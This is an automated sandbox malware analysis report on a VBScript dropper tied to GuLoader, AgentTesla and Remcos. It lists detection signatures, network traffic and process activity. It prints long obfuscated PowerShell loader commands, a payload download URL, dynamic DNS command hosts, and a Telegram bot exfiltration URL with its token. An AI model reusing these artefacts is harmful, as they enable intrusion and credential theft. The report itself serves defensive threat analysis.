Windows Analysis Report
IMG_2022028022-0120.vbs

Overview

General Information

Sample Name: IMG_2022028022-0120.vbs
Analysis ID: 755530
MD5: 752418aa9de96e0fc941ae1e7e33c906
SHA1: bb67df2d8a4b525b42211630386e4b51a97255a3
SHA256: cdce0391762117cc926a2131b5e0ec7724b69d1224dbabc7a3f351dfebf9b9bf
Infos:

Detection

AgentTesla, GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected Remcos RAT
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Creates multiple autostart registry keys
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Very long command line found
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses dynamic DNS services
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000008.00000002.7449931137.000000001F1C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Multi AV Scanner detection for domain / URL
Source: sinopbisikletkiralama.com Virustotal: Detection: 8% Perma Link
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49881 version: TLS 1.2

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.11.20:49881 -> 149.154.167.220:443
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Uses dynamic DNS services
Source: unknown DNS query: name: backupfrontmanny.duckdns.org
Source: unknown DNS query: name: myfrontmannyfive.ddns.net
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WKD-ASIE WKD-ASIE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /bot2135733177:AAGBiQMSb9sct4MUL0kpdpB0pPO3n3AKBfA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad181ce08d6acHost: api.telegram.orgContent-Length: 1015Expect: 100-continueConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 37.0.14.209 37.0.14.209
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /Bichloride.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sinopbisikletkiralama.comCache-Control: no-cache
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49814 -> 84.38.134.104:4939
Source: global traffic TCP traffic: 192.168.11.20:49815 -> 37.0.14.209:4939
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown HTTP traffic detected: POST /bot2135733177:AAGBiQMSb9sct4MUL0kpdpB0pPO3n3AKBfA/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad181ce08d6acHost: api.telegram.orgContent-Length: 1015Expect: 100-continueConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: sinopbisikletkiralama.com
Source: global traffic HTTP traffic detected: GET /Bichloride.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sinopbisikletkiralama.comCache-Control: no-cache
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49881 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe Jump to behavior
Creates a window with clipboard capturing capabilities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000008.00000002.7449931137.000000001F1C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Damspils = """ReFGruKonNacSktDoiKloUtnHe GrHshTPuBMi Mi{G ud ho Pr HvpflaRurNoaVamSo(st[DeSBotOrrMoiAnnBogPh]Di`$HiHStSBl)Ro;Pa Ni vn Ra Sa`$InBvoyUntAlesisBe Sp=Af UnNBreGrwKr-ByOCabOmjcyeUncBytOr PrbGlyFotPreSt[Be]Av Fa(fo`$AlHDeSSt.MiLQueRinPegBatHahGe Te/Un Ev2Me)Ta;Sm Op Fo St ChFmooKurUn(Sc`$HaiDr=Di0Pr;Is Ly`$HaiPo Sn-OvlKitCo Dy`$FlHSpSpe.GyLSkeOknbrgCatSahAl;Ko Sp`$DeiTr+Da=sk2Ak)La{Ma Sp Wh Ko Gu Va St Ba Pt`$PrBUdySttAueBesUr[Hy`$OdiSt/Kf2Ar]Re Ka=De Ku[AbcFooTonPavToeUdrCotFu]je:Bo:SpTstoSkBGlyGrtPreUr(Su`$UiHDeSNo.caSpruCobOvsPotwerHyiLinTrgCu(St`$MaiMa,Le Di2My)In,Pa Pa1Az6No)Ju;Co Ba Rn`$GaBOpyTitSteBosDi[Au`$EliAd/As2Ma]Pa Ve=Tr Sh(Ci`$SpBAayTetOxeBosIn[Ra`$MaiOm/Ba2Am]Bo Do-TibDixGloMorPa En2Fr0ba1Om)He;Au Vg Re Mr as}Mi Mi[SuSKktTurspiFanMagOv]En[GrSInyHysCltCaeStmIn.StTPoeUdxUntKo.reEAfnThcUnoTrdariUnnRegTa]Be:Ka:OvASlSTrCPaIExIBr.DiGSaehatMiSOutAlrSpiTanSugBi(me`$ElbInyEttIneMasSu)Ci;By}Mi`$InRHaeGrcOvaGilSycTeiOptRhrRiaHitdieMe0Pi=LiHomTExBOv Sn'Ho9ThASnBVi0VaBAaARaBCiDplACoCGyAVo4OpEIn7WeAKoDPeAEx5OpAFr5Cu'bi;Ge`$EmRAfeBycDiaEmlUncheiAptrirExaHetsteBe1lb=GuHDaTGeBSk Le'Di8Rg4LyApr0InAViASpBReBBoACo6SiBSlAKoAFi6ScABrFMiBLiDSiEMo7Be9laEUnASt0BiAKo7WrFCaAUnFStBHoECh7Ra9ChCPaABe7SkBadAPaATr8HuAKeFskADoCkn8Sk7MaAPr8RoBCrDFoAPe0MeBLaFScAJuCNo8Te4BoAReCSpBDiDdeAun1BiATi6TuAWeDHeBIlARi'Im;Ga`$HoRIseMicCaaChlPocFoiTrtberDeaFltFoeXx2ma=RuHMeTOvBNo Pi'Ru8LyERaAObCMyBAnDUn9In9AnBIdBbaAHy6WiAspAUn8Pa8JoABiDFlASvDFaBDaBCiAbiCHaBjaAPrBanAFo'Ju;Sa`$MtRThehicHyaUnlCycSeiDetNorSnaEbtTeeDy3Ge=urHMaTPhBBu Ex'Si9AdABeBNa0OlBMiASkBBoDBrAMuCUnARu4HoECh7Be9SyBFoBusCOpAUn7FaBUnDSpAOp0haAAn4KiAReCSrESm7Ga8Ro0DoAGl7TiBfoDGlASiCYoBSuBDeAJo6FlBAi9Af9MaAKiASpCSaBFjBGaBFrFBnAsw0OvAWeACuAteCToBLaAOuEFo7Sa8Se1InATi8SpAEc7DeAFoDSaAOp5FoAAlCGi9CyBFiAReCKlADrFFe'Ko;Be`$ToRMaePrcNoaInlRecEtiMatInrWiaKotAleEx4Ga=FoHTiTBaBWe Un'OvBTrAHeBinDIlBPyBFaAEv0KoABe7AmAStEUn'Fo;Co`$SkRSeeVacobabrlincRyiDetGrrWhaChtFoeRa5Ba=ccHSpTAnBPr Au'In8VgEFnAPaCYpBMoDOm8Kl4RaAMu6DeACoDHuBHiCSnAHy5LoAGeCUd8Th1TrAFl8InAEn7TaAUnDBuAel5AfAKaCRe'Un;Af`$GaRDeeBocmyaMelMacKviOptMirHeaTrtPaeSa6Pl=HeHOmTKiBUl Ea'Ku9svBUb9LiDGe9NeASuBFe9foANaClaAInAHeAFy0FoAKh8CaATr5un8To7FlAEn8KoAHe4DoABiCdiEBl5HiEOi9Ha8Po1MaAfl0alATaDDiACiCAf8GiBSpBCa0ra9BuADuAAe0UdACaESjETr5GoEHa9Op9Ma9StBexCWoAStBKrARn5BeAFl0AmAarAAf'Uk;Jo`$TeRBaeRecNaaHolDrcJeiOmtImrOuaNotSoeKo7Re=SuHXyTRuBTa Tr'na9LiBFoBScCHuADe7AaBGrDJuACa0foAGi4AnAReCGlEYo5MaEKa9Or8Mi4deAIn8MoASj7EuAth8FuAFoEimAMeCUnABeDGi'Ty;do`$TeRFleVacInaMelUocPuiOvtWirLeaKntMneAn8St=TiHPaTPaBSt St'Tn9LiBChANoCLyAJoFLyAAs5DiAFaCViADmABoBCaDOpALvCGaAHiDPr8HaDVaAPoCOvAPo5TaANoCcrAPrEScACi8MeBApDnoAKaCLy'St;Un`$SmRFieSicSeaSelDicPaivatRarTeaPotReeDr9Ov=MeHDoTSiBSt ca'Ta8os0GlANo7Ro8Ch4PeATrCreAOp4BeASt6aaBAaBIlBAl0En8st4HoAFe6YeARaDlsBExCUnAUn5PrAPoCde'Fo;Ro`$StDnoeGomFgaSugcynKieretEviAmzPaaLmbBllUdePl0Co=PaHAlTAgBKi ma'Ba8Dr4noBSy0Sa8ToDHuAFrCTeAT
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Damspils = """ReFGruKonNacSktDoiKloUtnHe GrHshTPuBMi Mi{G ud ho Pr HvpflaRurNoaVamSo(st[DeSBotOrrMoiAnnBogPh]Di`$HiHStSBl)Ro;Pa Ni vn Ra Sa`$InBvoyUntAlesisBe Sp=Af UnNBreGrwKr-ByOCabOmjcyeUncBytOr PrbGlyFotPreSt[Be]Av Fa(fo`$AlHDeSSt.MiLQueRinPegBatHahGe Te/Un Ev2Me)Ta;Sm Op Fo St ChFmooKurUn(Sc`$HaiDr=Di0Pr;Is Ly`$HaiPo Sn-OvlKitCo Dy`$FlHSpSpe.GyLSkeOknbrgCatSahAl;Ko Sp`$DeiTr+Da=sk2Ak)La{Ma Sp Wh Ko Gu Va St Ba Pt`$PrBUdySttAueBesUr[Hy`$OdiSt/Kf2Ar]Re Ka=De Ku[AbcFooTonPavToeUdrCotFu]je:Bo:SpTstoSkBGlyGrtPreUr(Su`$UiHDeSNo.caSpruCobOvsPotwerHyiLinTrgCu(St`$MaiMa,Le Di2My)In,Pa Pa1Az6No)Ju;Co Ba Rn`$GaBOpyTitSteBosDi[Au`$EliAd/As2Ma]Pa Ve=Tr Sh(Ci`$SpBAayTetOxeBosIn[Ra`$MaiOm/Ba2Am]Bo Do-TibDixGloMorPa En2Fr0ba1Om)He;Au Vg Re Mr as}Mi Mi[SuSKktTurspiFanMagOv]En[GrSInyHysCltCaeStmIn.StTPoeUdxUntKo.reEAfnThcUnoTrdariUnnRegTa]Be:Ka:OvASlSTrCPaIExIBr.DiGSaehatMiSOutAlrSpiTanSugBi(me`$ElbInyEttIneMasSu)Ci;By}Mi`$InRHaeGrcOvaGilSycTeiOptRhrRiaHitdieMe0Pi=LiHomTExBOv Sn'Ho9ThASnBVi0VaBAaARaBCiDplACoCGyAVo4OpEIn7WeAKoDPeAEx5OpAFr5Cu'bi;Ge`$EmRAfeBycDiaEmlUncheiAptrirExaHetsteBe1lb=GuHDaTGeBSk Le'Di8Rg4LyApr0InAViASpBReBBoACo6SiBSlAKoAFi6ScABrFMiBLiDSiEMo7Be9laEUnASt0BiAKo7WrFCaAUnFStBHoECh7Ra9ChCPaABe7SkBadAPaATr8HuAKeFskADoCkn8Sk7MaAPr8RoBCrDFoAPe0MeBLaFScAJuCNo8Te4BoAReCSpBDiDdeAun1BiATi6TuAWeDHeBIlARi'Im;Ga`$HoRIseMicCaaChlPocFoiTrtberDeaFltFoeXx2ma=RuHMeTOvBNo Pi'Ru8LyERaAObCMyBAnDUn9In9AnBIdBbaAHy6WiAspAUn8Pa8JoABiDFlASvDFaBDaBCiAbiCHaBjaAPrBanAFo'Ju;Sa`$MtRThehicHyaUnlCycSeiDetNorSnaEbtTeeDy3Ge=urHMaTPhBBu Ex'Si9AdABeBNa0OlBMiASkBBoDBrAMuCUnARu4HoECh7Be9SyBFoBusCOpAUn7FaBUnDSpAOp0haAAn4KiAReCSrESm7Ga8Ro0DoAGl7TiBfoDGlASiCYoBSuBDeAJo6FlBAi9Af9MaAKiASpCSaBFjBGaBFrFBnAsw0OvAWeACuAteCToBLaAOuEFo7Sa8Se1InATi8SpAEc7DeAFoDSaAOp5FoAAlCGi9CyBFiAReCKlADrFFe'Ko;Be`$ToRMaePrcNoaInlRecEtiMatInrWiaKotAleEx4Ga=FoHTiTBaBWe Un'OvBTrAHeBinDIlBPyBFaAEv0KoABe7AmAStEUn'Fo;Co`$SkRSeeVacobabrlincRyiDetGrrWhaChtFoeRa5Ba=ccHSpTAnBPr Au'In8VgEFnAPaCYpBMoDOm8Kl4RaAMu6DeACoDHuBHiCSnAHy5LoAGeCUd8Th1TrAFl8InAEn7TaAUnDBuAel5AfAKaCRe'Un;Af`$GaRDeeBocmyaMelMacKviOptMirHeaTrtPaeSa6Pl=HeHOmTKiBUl Ea'Ku9svBUb9LiDGe9NeASuBFe9foANaClaAInAHeAFy0FoAKh8CaATr5un8To7FlAEn8KoAHe4DoABiCdiEBl5HiEOi9Ha8Po1MaAfl0alATaDDiACiCAf8GiBSpBCa0ra9BuADuAAe0UdACaESjETr5GoEHa9Op9Ma9StBexCWoAStBKrARn5BeAFl0AmAarAAf'Uk;Jo`$TeRBaeRecNaaHolDrcJeiOmtImrOuaNotSoeKo7Re=SuHXyTRuBTa Tr'na9LiBFoBScCHuADe7AaBGrDJuACa0foAGi4AnAReCGlEYo5MaEKa9Or8Mi4deAIn8MoASj7EuAth8FuAFoEimAMeCUnABeDGi'Ty;do`$TeRFleVacInaMelUocPuiOvtWirLeaKntMneAn8St=TiHPaTPaBSt St'Tn9LiBChANoCLyAJoFLyAAs5DiAFaCViADmABoBCaDOpALvCGaAHiDPr8HaDVaAPoCOvAPo5TaANoCcrAPrEScACi8MeBApDnoAKaCLy'St;Un`$SmRFieSicSeaSelDicPaivatRarTeaPotReeDr9Ov=MeHDoTSiBSt ca'Ta8os0GlANo7Ro8Ch4PeATrCreAOp4BeASt6aaBAaBIlBAl0En8st4HoAFe6YeARaDlsBExCUnAUn5PrAPoCde'Fo;Ro`$StDnoeGomFgaSugcynKieretEviAmzPaaLmbBllUdePl0Co=PaHAlTAgBKi ma'Ba8Dr4noBSy0Sa8ToDHuAFrCTeAT Jump to behavior
Potential malicious VBS script found (suspicious strings)
Source: Initial file: Fusendes.ShellExecute Nske,Br0, "", "", 0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Dropped file: Steuroperens.ShellExecute Meninger,Ma5, "", "", 0 Jump to dropped file
Very long command line found
